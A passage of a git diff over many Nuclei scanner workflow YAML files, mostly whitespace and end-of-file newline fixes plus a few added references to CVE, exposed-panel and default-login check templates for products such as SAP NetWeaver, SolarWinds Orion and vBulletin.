+4,9 @@ info: name: Qcubed Security Checks author: daffainfo description: A simple workflow that runs all Qcubed related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: qcubed subtemplates: - - tags: qcubed \ No newline at end of file + - tags: qcubed diff --git a/workflows/r-seenet-workflow.yaml b/workflows/r-seenet-workflow.yaml index a048da745f..2afc176a10 100644 --- a/workflows/r-seenet-workflow.yaml +++ b/workflows/r-seenet-workflow.yaml @@ -4,7 +4,6 @@ info: name: R-SeeNet Security Checks author: daffainfo description: A simple workflow that runs all R-SeeNet related nuclei templates on a given target. - workflows: - template: http/technologies/rseenet-detect.yaml subtemplates: diff --git a/workflows/rabbitmq-workflow.yaml b/workflows/rabbitmq-workflow.yaml index da2416fd90..6bf97932e5 100644 --- a/workflows/rabbitmq-workflow.yaml +++ b/workflows/rabbitmq-workflow.yaml @@ -4,9 +4,7 @@ info: name: RabbitMQ Security Checks author: fyoorer description: A simple workflow that runs all rabbitmq related nuclei templates on a given target. - workflows: - template: http/exposed-panels/rabbitmq-dashboard.yaml - subtemplates: - - template: http/default-logins/rabbitmq/ \ No newline at end of file + - template: http/default-logins/rabbitmq/ diff --git a/workflows/rancher-workflow.yaml b/workflows/rancher-workflow.yaml index 49798b4268..3798690dfa 100644 --- a/workflows/rancher-workflow.yaml +++ b/workflows/rancher-workflow.yaml @@ -4,7 +4,6 @@ info: name: Rancher Security Checks author: daffainfo description: A simple workflow that runs all Rancher related nuclei templates on a given target. - workflows: - template: http/exposed-panels/rancher-panel.yaml subtemplates: diff --git a/workflows/rconfig-workflow.yaml b/workflows/rconfig-workflow.yaml index 648950fad5..7e4345c7b9 100644 --- a/workflows/rconfig-workflow.yaml +++ b/workflows/rconfig-workflow.yaml @@ -4,7 +4,6 @@ info: name: rConfig Security Checks author: daffainfo description: A simple workflow that runs all rConfig related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: diff --git a/workflows/ricoh-workflow.yaml b/workflows/ricoh-workflow.yaml index 565d52ebde..38b419b8c9 100644 --- a/workflows/ricoh-workflow.yaml +++ b/workflows/ricoh-workflow.yaml @@ -4,10 +4,9 @@ info: name: Ricoh Security Checks author: daffainfo description: A simple workflow that runs all Ricoh related nuclei templates on a given target. - workflows: - template: http/technologies/favicon-detect.yaml matchers: - name: ricoh subtemplates: - - tags: ricoh \ No newline at end of file + - tags: ricoh diff --git a/workflows/rosariosis-workflow.yaml b/workflows/rosariosis-workflow.yaml index 8f153c15c2..83a1290a5a 100644 --- a/workflows/rosariosis-workflow.yaml +++ b/workflows/rosariosis-workflow.yaml @@ -4,7 +4,6 @@ info: name: Rosario Student Information System (rosariosis) Security Checks author: daffainfo description: A simple workflow that runs all Rosario Student Information System (rosariosis) related nuclei templates on a given target. - workflows: - template: http/technologies/rosariosis-detect.yaml subtemplates: diff --git a/workflows/rstudio-workflow.yaml b/workflows/rstudio-workflow.yaml index 360561bafd..41585782f3 100644 --- a/workflows/rstudio-workflow.yaml +++ b/workflows/rstudio-workflow.yaml @@ -4,8 +4,7 @@ info: name: RStudio Security Checks author: daffainfo description: A simple workflow that runs all RStudio related nuclei templates on a given target. - workflows: - template: http/exposed-panels/rstudio-detect.yaml subtemplates: - - tags: rstudio \ No newline at end of file + - tags: rstudio diff --git a/workflows/ruijie-workflow.yaml b/workflows/ruijie-workflow.yaml index 4748b76d3f..f2491e57fd 100644 --- a/workflows/ruijie-workflow.yaml +++ b/workflows/ruijie-workflow.yaml @@ -4,6 +4,5 @@ info: name: Ruijie Checks author: pikpikcu description: A simple workflow that runs all Ruijie related nuclei templates on a given target. - workflows: - - tags: ruijie \ No newline at end of file + - tags: ruijie diff --git a/workflows/saltstack-workflow.yaml b/workflows/saltstack-workflow.yaml index 27b27e9a43..627564b3f3 100644 --- a/workflows/saltstack-workflow.yaml +++ b/workflows/saltstack-workflow.yaml @@ -4,10 +4,9 @@ info: name: SaltStack Security Checks author: daffainfo description: A simple workflow that runs all SaltStack related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: saltstack subtemplates: - - tags: saltstack \ No newline at end of file + - tags: saltstack diff --git a/workflows/samsung-wlan-ap-workflow.yaml b/workflows/samsung-wlan-ap-workflow.yaml index 487cf0112d..46ec2b577b 100644 --- a/workflows/samsung-wlan-ap-workflow.yaml +++ b/workflows/samsung-wlan-ap-workflow.yaml @@ -4,7 +4,7 @@ info: name: Samsung Wlan AP (WEA453e) Checks author: pikpikcu description: A simple workflow that runs all samsung WlanAP related nuclei templates on a given target. - workflows: - template: http/default-logins/samsung/ - - template: http/vulnerabilities/samsung/ \ No newline at end of file + + - template: http/vulnerabilities/samsung/ diff --git a/workflows/sap-netweaver-workflow.yaml b/workflows/sap-netweaver-workflow.yaml index a4f94ae8d0..6f20c907a1 100644 --- a/workflows/sap-netweaver-workflow.yaml +++ b/workflows/sap-netweaver-workflow.yaml @@ -4,19 +4,25 @@ info: name: SAP NetWaver Security Checks author: dwisiswant0 description: A simple workflow that runs all SAP NetWaver related nuclei templates on a given target. - workflows: - template: http/technologies/sap/sap-netweaver-detect.yaml subtemplates: - template: http/cves/2020/CVE-2020-6287.yaml + - template: http/cves/2017/CVE-2017-12637.yaml + - template: http/cves/2020/CVE-2020-6308.yaml + - template: http/exposed-panels/fiorilaunchpad-logon.yaml + - template: http/exposed-panels/hmc-hybris-panel.yaml + - template: http/exposed-panels/sap-netweaver-portal.yaml + - template: http/exposed-panels/sap-hana-xsengine-panel.yaml + - template: http/misconfiguration/sap/ - - template: network/detection/sap-router.yaml # Network Templates + - template: network/detection/sap-router.yaml # Network Templates subtemplates: - template: network/misconfig/sap-router-info-leak.yaml diff --git a/workflows/sarg-workflow.yaml b/workflows/sarg-workflow.yaml index f9a7f05753..b4ac35bf10 100644 --- a/workflows/sarg-workflow.yaml +++ b/workflows/sarg-workflow.yaml @@ -4,10 +4,9 @@ info: name: SARG Security Checks author: daffainfo description: A simple workflow that runs all SARG related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: sarg subtemplates: - - tags: sarg \ No newline at end of file + - tags: sarg diff --git a/workflows/sco-workflow.yaml b/workflows/sco-workflow.yaml index 7af0c81cfe..b3b150f560 100644 --- a/workflows/sco-workflow.yaml +++ b/workflows/sco-workflow.yaml @@ -4,10 +4,9 @@ info: name: SCO Security Checks author: daffainfo description: A simple workflow that runs all SCO related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: sco subtemplates: - - tags: sco \ No newline at end of file + - tags: sco diff --git a/workflows/sequoiadb-workflow.yaml b/workflows/sequoiadb-workflow.yaml index fa58fec625..c58d0a796c 100644 --- a/workflows/sequoiadb-workflow.yaml +++ b/workflows/sequoiadb-workflow.yaml @@ -4,7 +4,6 @@ info: name: SequoiaDB Security Checks author: daffainfo description: A simple workflow that runs all SequoiaDB related nuclei templates on a given target. - workflows: - template: http/exposed-panels/sequoiadb-login.yaml subtemplates: diff --git a/workflows/sharepoint-workflow.yaml b/workflows/sharepoint-workflow.yaml index bf26952006..08814d90b9 100644 --- a/workflows/sharepoint-workflow.yaml +++ b/workflows/sharepoint-workflow.yaml @@ -4,10 +4,9 @@ info: name: Microsoft Sharepoint Security Checks author: daffainfo description: A simple workflow that runs all Microsoft Sharepoint related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: - name: sharepoint subtemplates: - - tags: sharepoint \ No newline at end of file + - tags: sharepoint diff --git a/workflows/shopxo-workflow.yaml b/workflows/shopxo-workflow.yaml index a45d2197fc..5bd9c6e525 100644 --- a/workflows/shopxo-workflow.yaml +++ b/workflows/shopxo-workflow.yaml @@ -4,10 +4,9 @@ info: name: ShopXO Security Checks author: daffainfo description: A simple workflow that runs all ShopXO related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: shopxo subtemplates: - - tags: shopxo \ No newline at end of file + - tags: shopxo diff --git a/workflows/sidekiq-workflow.yaml b/workflows/sidekiq-workflow.yaml index 45dad89ed6..d3cd57775c 100644 --- a/workflows/sidekiq-workflow.yaml +++ b/workflows/sidekiq-workflow.yaml @@ -4,7 +4,6 @@ info: name: Sidekiq Security Checks author: daffainfo description: A simple workflow that runs all Sidekiq related nuclei templates on a given target. - workflows: - template: http/exposed-panels/sidekiq-dashboard.yaml subtemplates: diff --git a/workflows/sitecore-workflow.yaml b/workflows/sitecore-workflow.yaml index 4603b467bd..b5be768444 100644 --- a/workflows/sitecore-workflow.yaml +++ b/workflows/sitecore-workflow.yaml @@ -4,8 +4,7 @@ info: name: SiteCore Security Checks author: pdteam description: A simple workflow that runs all SiteCore related nuclei templates on a given target. - workflows: - template: http/technologies/default-sitecore-page.yaml subtemplates: - - tags: sitecore \ No newline at end of file + - tags: sitecore diff --git a/workflows/skywalking-workflow.yaml b/workflows/skywalking-workflow.yaml index 480fc0e217..312a47704e 100644 --- a/workflows/skywalking-workflow.yaml +++ b/workflows/skywalking-workflow.yaml @@ -4,10 +4,9 @@ info: name: Apache SkyWalking Security Checks author: daffainfo description: A simple workflow that runs all Apache SkyWalking related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: skywalking subtemplates: - - tags: skywalking \ No newline at end of file + - tags: skywalking diff --git a/workflows/solarwinds-orion-workflow.yaml b/workflows/solarwinds-orion-workflow.yaml index a5db2add7f..09af1d627c 100644 --- a/workflows/solarwinds-orion-workflow.yaml +++ b/workflows/solarwinds-orion-workflow.yaml @@ -4,10 +4,11 @@ info: name: SolarWinds Orion Security Checks author: dwisiswant0 description: A simple workflow that runs all SolarWinds Orion related nuclei templates on a given target. - workflows: - template: http/exposed-panels/solarwinds-orion.yaml subtemplates: - template: http/cves/2018/CVE-2018-19386.yaml + - template: http/cves/2020/CVE-2020-10148.yaml - - template: http/default-logins/solarwinds/ \ No newline at end of file + + - template: http/default-logins/solarwinds/ diff --git a/workflows/solr-workflow.yaml b/workflows/solr-workflow.yaml index c5b384dec9..688fe6c3ee 100644 --- a/workflows/solr-workflow.yaml +++ b/workflows/solr-workflow.yaml @@ -4,7 +4,6 @@ info: name: Apache Solr Security Checks author: daffainfo description: A simple workflow that runs all Apache Solr related nuclei templates on a given target. - workflows: - template: http/exposed-panels/solr-panel-exposure.yaml subtemplates: diff --git a/workflows/sonarqube-workflow.yaml b/workflows/sonarqube-workflow.yaml index 9933b7533c..8276125799 100644 --- a/workflows/sonarqube-workflow.yaml +++ b/workflows/sonarqube-workflow.yaml @@ -4,8 +4,7 @@ info: name: SonarQube Security Checks author: daffainfo description: A simple workflow that runs all SonarQube related nuclei templates on a given target. - workflows: - template: http/exposed-panels/sonarqube-login.yaml subtemplates: - - tags: sonarqube \ No newline at end of file + - tags: sonarqube diff --git a/workflows/sourcebans-workflow.yaml b/workflows/sourcebans-workflow.yaml index 2a2bb05694..303a6268ba 100644 --- a/workflows/sourcebans-workflow.yaml +++ b/workflows/sourcebans-workflow.yaml @@ -4,10 +4,9 @@ info: name: SourceBans Security Checks author: daffainfo description: A simple workflow that runs all SourceBans related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: sourcebans subtemplates: - - tags: sourcebans \ No newline at end of file + - tags: sourcebans diff --git a/workflows/splunk-workflow.yaml b/workflows/splunk-workflow.yaml index c0973fd18e..430505def0 100644 --- a/workflows/splunk-workflow.yaml +++ b/workflows/splunk-workflow.yaml @@ -4,10 +4,9 @@ info: name: Splink Security Checks author: daffainfo description: A simple workflow that runs all Splink related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: - name: splunk subtemplates: - - tags: splunk \ No newline at end of file + - tags: splunk diff --git a/workflows/springboot-workflow.yaml b/workflows/springboot-workflow.yaml index e484d33477..f93c70e152 100644 --- a/workflows/springboot-workflow.yaml +++ b/workflows/springboot-workflow.yaml @@ -4,7 +4,6 @@ info: name: Spring Boot Security Checks author: dwisiswant0 description: A simple workflow that runs all Spring Boot related nuclei templates on a given target. - workflows: - template: http/technologies/springboot-actuator.yaml subtemplates: diff --git a/workflows/squirrelmail-workflow.yaml b/workflows/squirrelmail-workflow.yaml index f880dfa62c..dc7f64c7b8 100644 --- a/workflows/squirrelmail-workflow.yaml +++ b/workflows/squirrelmail-workflow.yaml @@ -4,7 +4,6 @@ info: name: SquirrelMail Security Checks author: daffainfo description: A simple workflow that runs all SquirrelMail related nuclei templates on a given target. - workflows: - template: http/exposed-panels/squirrelmail-login.yaml subtemplates: diff --git a/workflows/subrion-workflow.yaml b/workflows/subrion-workflow.yaml index f1ca51e84a..f2a51bb619 100644 --- a/workflows/subrion-workflow.yaml +++ b/workflows/subrion-workflow.yaml @@ -4,10 +4,9 @@ info: name: Subrion CMS Security Checks author: daffainfo description: A simple workflow that runs all Subrion CMS related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: subrion subtemplates: - - tags: subrion \ No newline at end of file + - tags: subrion diff --git a/workflows/sugarcrm-workflow.yaml b/workflows/sugarcrm-workflow.yaml index 5580de92e2..940fd36603 100644 --- a/workflows/sugarcrm-workflow.yaml +++ b/workflows/sugarcrm-workflow.yaml @@ -4,10 +4,9 @@ info: name: SugarCRM Security Checks author: daffainfo description: A simple workflow that runs all SugarCRM related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: sugarcrm subtemplates: - - tags: sugarcrm \ No newline at end of file + - tags: sugarcrm diff --git a/workflows/symfony-workflow.yaml b/workflows/symfony-workflow.yaml index 0758518dcd..b2c66aa522 100644 --- a/workflows/symfony-workflow.yaml +++ b/workflows/symfony-workflow.yaml @@ -4,7 +4,6 @@ info: name: Symfony Security Checks author: daffainfo description: A simple workflow that runs all Symfony related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: diff --git a/workflows/sysaid-workflow.yaml b/workflows/sysaid-workflow.yaml index 52d9f1d9bb..3f1b0f6e4f 100644 --- a/workflows/sysaid-workflow.yaml +++ b/workflows/sysaid-workflow.yaml @@ -4,8 +4,7 @@ info: name: SysAid Security Checks author: pdteam description: A simple workflow that runs all SysAid related nuclei templates on a given target. - workflows: - template: http/exposed-panels/sysaid-panel.yaml subtemplates: - - tags: sysaid \ No newline at end of file + - tags: sysaid diff --git a/workflows/tapestry-workflow.yaml b/workflows/tapestry-workflow.yaml index 3c9a5edb3e..1bb35551e7 100644 --- a/workflows/tapestry-workflow.yaml +++ b/workflows/tapestry-workflow.yaml @@ -4,7 +4,6 @@ info: name: Apache Tapestry Security Checks author: daffainfo description: A simple workflow that runs all Apache Tapestry related nuclei templates on a given target. - workflows: - template: http/technologies/apache/apache-tapestry-detect.yaml subtemplates: diff --git a/workflows/terramaster-workflow.yaml b/workflows/terramaster-workflow.yaml index f0cdacf525..fc20186463 100644 --- a/workflows/terramaster-workflow.yaml +++ b/workflows/terramaster-workflow.yaml @@ -4,7 +4,6 @@ info: name: TerraMaster Security Checks author: daffainfo description: A simple workflow that runs all TerraMaster related nuclei templates on a given target. - workflows: - template: http/exposed-panels/terramaster-login.yaml subtemplates: diff --git a/workflows/thinfinity-workflow.yaml b/workflows/thinfinity-workflow.yaml index 66ca98dad6..49953551ff 100644 --- a/workflows/thinfinity-workflow.yaml +++ b/workflows/thinfinity-workflow.yaml @@ -4,7 +4,6 @@ info: name: Thinfinity VirtualUI Security Checks author: daffainfo description: A simple workflow that runs all Thinfinity VirtualUI related nuclei templates on a given target. - workflows: - template: http/exposed-panels/thinfinity-virtualui-panel.yaml subtemplates: diff --git a/workflows/thinkadmin-workflow.yaml b/workflows/thinkadmin-workflow.yaml index 629afe090c..62277d70c6 100644 --- a/workflows/thinkadmin-workflow.yaml +++ b/workflows/thinkadmin-workflow.yaml @@ -4,10 +4,9 @@ info: name: ThinkAdmin Security Checks author: daffainfo description: A simple workflow that runs all ThinkAdmin related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: thinkadmin subtemplates: - - tags: thinkadmin \ No newline at end of file + - tags: thinkadmin diff --git a/workflows/thinkcmf-workflow.yaml b/workflows/thinkcmf-workflow.yaml index ecbb685a1b..1206187a8c 100644 --- a/workflows/thinkcmf-workflow.yaml +++ b/workflows/thinkcmf-workflow.yaml @@ -4,7 +4,6 @@ info: name: ThinkCMF Security Checks author: pdteam description: A simple workflow that runs all ThinkCMF related nuclei templates on a given target. - workflows: - template: http/technologies/thinkcmf-detect.yaml subtemplates: diff --git a/workflows/thinkphp-workflow.yaml b/workflows/thinkphp-workflow.yaml index ece460a8d2..a00582deac 100644 --- a/workflows/thinkphp-workflow.yaml +++ b/workflows/thinkphp-workflow.yaml @@ -4,7 +4,6 @@ info: name: ThinkPHP Security Checks author: dr_set description: A simple workflow that runs all ThinkPHP related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: diff --git a/workflows/thruk-workflow.yaml b/workflows/thruk-workflow.yaml index ba7fd6cfef..acd25b3e16 100644 --- a/workflows/thruk-workflow.yaml +++ b/workflows/thruk-workflow.yaml @@ -4,7 +4,6 @@ info: name: Thruk Security Checks author: daffainfo description: A simple workflow that runs all Thruk related nuclei templates on a given target. - workflows: - template: http/exposed-panels/thruk-login.yaml subtemplates: diff --git a/workflows/tikiwiki-workflow.yaml b/workflows/tikiwiki-workflow.yaml index 60538faefc..58231aedc6 100644 --- a/workflows/tikiwiki-workflow.yaml +++ b/workflows/tikiwiki-workflow.yaml @@ -4,7 +4,6 @@ info: name: Tiki Wiki Security Checks author: daffainfo description: A simple workflow that runs all Tiki Wiki related nuclei templates on a given target. - workflows: - template: http/exposed-panels/tikiwiki-cms.yaml subtemplates: diff --git a/workflows/tomcat-workflow.yaml b/workflows/tomcat-workflow.yaml index d1e3a6fe36..77d61e1f48 100644 --- a/workflows/tomcat-workflow.yaml +++ b/workflows/tomcat-workflow.yaml @@ -4,7 +4,6 @@ info: name: Tomcat Security Checks author: pathtaga description: A simple workflow that runs all Tomcat related nuclei templates on a given target. - workflows: - template: http/technologies/apache/tomcat-detect.yaml subtemplates: diff --git a/workflows/tongda-workflow.yaml b/workflows/tongda-workflow.yaml index c1ae6bf482..3f6e609ba6 100644 --- a/workflows/tongda-workflow.yaml +++ b/workflows/tongda-workflow.yaml @@ -4,7 +4,6 @@ info: name: TongDa Security Checks author: daffainfo description: A simple workflow that runs all TongDa related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: diff --git a/workflows/tpshop-workflow.yaml b/workflows/tpshop-workflow.yaml index 53411d1d0c..8b3d1410f7 100644 --- a/workflows/tpshop-workflow.yaml +++ b/workflows/tpshop-workflow.yaml @@ -4,7 +4,6 @@ info: name: TPshop Security Checks author: daffainfo description: A simple workflow that runs all TPshop related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: diff --git a/workflows/traefik-workflow.yaml b/workflows/traefik-workflow.yaml index 5078548bc8..f86a9d77f9 100644 --- a/workflows/traefik-workflow.yaml +++ b/workflows/traefik-workflow.yaml @@ -4,7 +4,6 @@ info: name: Traefik Security Checks author: daffainfo description: A simple workflow that runs all Traefik related nuclei templates on a given target. - workflows: - template: http/exposed-panels/traefik-dashboard.yaml subtemplates: diff --git a/workflows/umbraco-workflow.yaml b/workflows/umbraco-workflow.yaml index deb1668291..b7d9285081 100644 --- a/workflows/umbraco-workflow.yaml +++ b/workflows/umbraco-workflow.yaml @@ -4,10 +4,9 @@ info: name: Umbraco Security Checks author: daffainfo description: A simple workflow that runs all Umbraco related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: - name: umbraco subtemplates: - - tags: umbraco \ No newline at end of file + - tags: umbraco diff --git a/workflows/vbulletin-workflow.yaml b/workflows/vbulletin-workflow.yaml index c15edb1b8e..a171b61afd 100644 --- a/workflows/vbulletin-workflow.yaml +++ b/workflows/vbulletin-workflow.yaml @@ -4,11 +4,11 @@ info: name: vBulletin Security Checks author: pdteam description: A simple workflow that runs all vBulletin related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: - name: vbulletin subtemplates: - template: http/cves/2019/CVE-2019-16759.yaml + - template: http/cves/2020/CVE-2020-12720.yaml diff --git a/workflows/vmware-workflow.yaml b/workflows/vmware-workflow.yaml index 023572c2a1..9916dc4287 100644 --- a/workflows/vmware-workflow.yaml +++ b/workflows/vmware-workflow.yaml @@ -4,7 +4,6 @@ info: name: VMware Security Checks author: daffainfo description: A simple workflow that runs all VMware Pipeline related nuclei templates on a given target. - workflows: - template: http/technologies/vmware/vmware-detect.yaml subtemplates: diff --git a/workflows/voipmonitor-workflow.yaml b/workflows/voipmonitor-workflow.yaml index 012bcd6815..3b2711f6ee 100644 --- a/workflows/voipmonitor-workflow.yaml +++ b/workflows/voipmonitor-workflow.yaml @@ -4,7 +4,6 @@ info: name: VoipMonitor Security Checks author: daffainfo description: A simple workflow that runs all VoipMonitor related nuclei templates on a given target. - workflows: - template: http/exposed-panels/voipmonitor-panel.yaml subtemplates: diff --git a/workflows/weblogic-workflow.yaml b/workflows/weblogic-workflow.yaml index 15b201535d..f6bd9966c9 100644 --- a/workflows/weblogic-workflow.yaml +++ b/workflows/weblogic-workflow.yaml @@ -4,7 +4,6 @@ info: name: WebLogic Security Checks author: dr_set description: A simple workflow that runs all WebLogic related nuclei templates on a given target. - workflows: - template: http/technologies/weblogic-detect.yaml subtemplates: diff --git a/workflows/webmin-workflow.yaml b/workflows/webmin-workflow.yaml index 7bd026251e..7c6c6e68be 100644 --- a/workflows/webmin-workflow.yaml +++ b/workflows/webmin-workflow.yaml @@ -4,7 +4,6 @@ info: name: Webmin Security Checks author: daffainfo description: A simple workflow that runs all Webmin related nuclei templates on a given target. - workflows: - template: http/exposed-panels/webmin-panel.yaml subtemplates: diff --git a/workflows/websvn-workflow.yaml b/workflows/websvn-workflow.yaml index b254927d89..52962c6917 100644 --- a/workflows/websvn-workflow.yaml +++ b/workflows/websvn-workflow.yaml @@ -4,10 +4,9 @@ info: name: Websvn Security Checks author: daffainfo description: A simple workflow that runs all Websvn related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: websvn subtemplates: - - tags: websvn \ No newline at end of file + - tags: websvn diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index df0a6c0ffe..ddd01358a1 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -4,9 +4,7 @@ info: name: Wordpress Security Checks author: kiblyn11,zomsop82 description: A simple workflow that runs all wordpress related nuclei templates on a given target. - workflows: - - template: http/technologies/wordpress-detect.yaml subtemplates: - tags: wordpress diff --git a/workflows/worksite-takeover-workflow.yaml b/workflows/worksite-takeover-workflow.yaml index d75c36ec26..5d5962002a 100644 --- a/workflows/worksite-takeover-workflow.yaml +++ b/workflows/worksite-takeover-workflow.yaml @@ -5,7 +5,6 @@ info: author: pdteam description: A simple workflow that runs DNS based detection to filter hosts running Worksite and do further HTTP based check to confirm takeover. reference: https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites - workflows: - template: dns/worksites-detection.yaml subtemplates: diff --git a/workflows/wuzhicms-workflow.yaml b/workflows/wuzhicms-workflow.yaml index f9546a83c4..48a9726ecc 100644 --- a/workflows/wuzhicms-workflow.yaml +++ b/workflows/wuzhicms-workflow.yaml @@ -4,7 +4,6 @@ info: name: Wuzhicms Security Checks author: daffainfo description: A simple workflow that runs all Wuzhicms related nuclei templates on a given target. - workflows: - template: http/technologies/wuzhicms-detect.yaml subtemplates: diff --git a/workflows/xdcms-workflow.yaml b/workflows/xdcms-workflow.yaml index 872edff660..927e95b2bf 100644 --- a/workflows/xdcms-workflow.yaml +++ b/workflows/xdcms-workflow.yaml @@ -4,10 +4,9 @@ info: name: XdCMS Security Checks author: daffainfo description: A simple workflow that runs all XdCMS related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: xdcms subtemplates: - - tags: xdcms \ No newline at end of file + - tags: xdcms diff --git a/workflows/xiuno-workflow.yaml b/workflows/xiuno-workflow.yaml index 1af8efee59..35c95c6141 100644 --- a/workflows/xiuno-workflow.yaml +++ b/workflows/xiuno-workflow.yaml @@ -4,10 +4,9 @@ info: name: Xiuno Security Checks author: daffainfo description: A simple workflow that runs all Xiuno related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: xiuno subtemplates: - - tags: xiuno \ No newline at end of file + - tags: xiuno diff --git a/workflows/xxljob-workflow.yaml b/workflows/xxljob-workflow.yaml index f3688b8943..20af9b341b 100644 --- a/workflows/xxljob-workflow.yaml +++ b/workflows/xxljob-workflow.yaml @@ -4,7 +4,6 @@ info: name: XXL-JOB Security Checks author: daffainfo description: A simple workflow that runs all XXL-JOB related nuclei templates on a given target. - workflows: - template: http/exposed-panels/xxljob-panel.yaml subtemplates: diff --git a/workflows/yapi-workflow.yaml b/workflows/yapi-workflow.yaml index 2e043d6ba5..6afa9f6c68 100644 --- a/workflows/yapi-workflow.yaml +++ b/workflows/yapi-workflow.yaml @@ -4,10 +4,9 @@ info: name: YApi Security Checks author: daffainfo description: A simple workflow that runs all YApi related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: yapi subtemplates: - - tags: yapi \ No newline at end of file + - tags: yapi diff --git a/workflows/yii-workflow.yaml b/workflows/yii-workflow.yaml index 873c15bfad..f89a49f0ab 100644 --- a/workflows/yii-workflow.yaml +++ b/workflows/yii-workflow.yaml @@ -4,10 +4,9 @@ info: name: Yii Security Checks author: daffainfo description: A simple workflow that runs all Yii related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: - name: yii subtemplates: - - tags: yii \ No newline at end of file + - tags: yii diff --git a/workflows/yonyou-nc-workflow.yaml b/workflows/yonyou-nc-workflow.yaml index 869f3f00b2..c2b0b1e918 100644 --- a/workflows/yonyou-nc-workflow.yaml +++ b/workflows/yonyou-nc-workflow.yaml @@ -4,7 +4,6 @@ info: name: Yonyou Ufida NC Security Checks author: Arm!tage description: A simple workflow that runs all Yonyou Network Technology Co. (Ufida) NC related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: diff --git a/workflows/zabbix-workflow.yaml b/workflows/zabbix-workflow.yaml index 1751d1ffce..42e5eb9859 100644 --- a/workflows/zabbix-workflow.yaml +++ b/workflows/zabbix-workflow.yaml @@ -4,7 +4,6 @@ info: name: Zabbix Security Checks author: daffainfo description: A simple workflow that runs all Zabbix related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: diff --git a/workflows/zcms-workflow.yaml b/workflows/zcms-workflow.yaml index 3db2b6bbda..a178903795 100644 --- a/workflows/zcms-workflow.yaml +++ b/workflows/zcms-workflow.yaml @@ -4,10 +4,9 @@ info: name: ZCMS Security Checks author: daffainfo description: A simple workflow that runs all ZCMS related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: zcms subtemplates: - - tags: zcms \ No newline at end of file + - tags: zcms diff --git a/workflows/zeroshell-workflow.yaml b/workflows/zeroshell-workflow.yaml index 2cdaad1383..770be894a5 100644 --- a/workflows/zeroshell-workflow.yaml +++ b/workflows/zeroshell-workflow.yaml @@ -4,8 +4,7 @@ info: name: ZeroShell Security Checks author: daffainfo description: A simple workflow that runs all ZeroShell related nuclei templates on a given target. - workflows: - template: http/exposed-panels/zeroshell-login.yaml subtemplates: - - tags: zeroshell \ No newline at end of file + - tags: zeroshell diff --git a/workflows/zimbra-workflow.yaml b/workflows/zimbra-workflow.yaml index 41d54dff41..875089e751 100644 --- a/workflows/zimbra-workflow.yaml +++ b/workflows/zimbra-workflow.yaml @@ -4,7 +4,6 @@ info: name: Zimbra Security Checks author: daffainfo description: A simple workflow that runs all Zimbra related nuclei templates on a given target. - workflows: - template: http/exposed-panels/zimbra-web-client.yaml subtemplates: diff --git a/workflows/zzzcms-workflow.yaml b/workflows/zzzcms-workflow.yaml index 1f887a43d0..ebbbf07ab7 100644 --- a/workflows/zzzcms-workflow.yaml +++ b/workflows/zzzcms-workflow.yaml @@ -4,10 +4,9 @@ info: name: ZZZCMS Security Checks author: daffainfo description: A simple workflow that runs all ZZZCMS related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: zzzcms subtemplates: - - tags: zzzcms \ No newline at end of file + - tags: zzzcms
troy serial server